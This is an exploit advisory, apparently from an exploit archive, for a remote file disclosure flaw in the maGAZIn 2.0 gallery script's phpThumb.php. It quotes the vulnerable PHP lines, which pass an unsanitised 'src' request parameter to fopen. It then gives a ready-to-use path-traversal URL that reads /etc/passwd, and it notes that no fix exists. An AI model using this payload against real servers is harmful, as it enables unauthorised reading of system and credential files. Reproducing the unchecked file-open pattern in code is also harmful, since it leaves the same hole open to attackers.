maGAZIn 2.0 (phpThumb.php src) Remote File Disclosure Vulnerability

2007-05-11 00:00:00

\\\|///
\\ - - //
( @ @ )
----oOOo--(_)-oOOo---------------------------------------------------

[ Y! Underground Group ]
[ [email protected] ]
[ Dj7xpl.2600.ir ]

----ooooO-----Ooooo--------------------------------------------------
( ) ( )
\ ( ) /
\_) (_/

---------------------------------------------------------------------

[!] Portal : maGAZIn v2.0
[!] Download : http://www.pinkcrow.net/Scripts/gallery.php
[!] Type : Remote File Disclosure Vulnerability

---------------------------------------------------------------------

---------------------------------------------------------------------

Vuln Code : Line (152 - 157)

[Code]
if ($fp = @fopen($_SERVER['DOCUMENT_ROOT'].$_REQUEST['src'], 'rb')) {
$OriginalImageData = fread($fp, filesize($_SERVER['DOCUMENT_ROOT'].$_REQUEST['src']));
fclose($fp);
} else {
ErrorImage('cannot open '.$_SERVER['DOCUMENT_ROOT'].$_REQUEST['src'], 400, 50);
}
[/Code]

---------------------------------------------------------------------

---------------------------------------------------------------------

Bug :

http://[Target]/[Path]/phpThumb.php?src=[Local File]

Example :

http://Target.ir/Gallery/phpThumb.php?src=../../../etc/passwd

---------------------------------------------------------------------

#

Fixes

No fixes

In order to submit a new fix you need to be registered.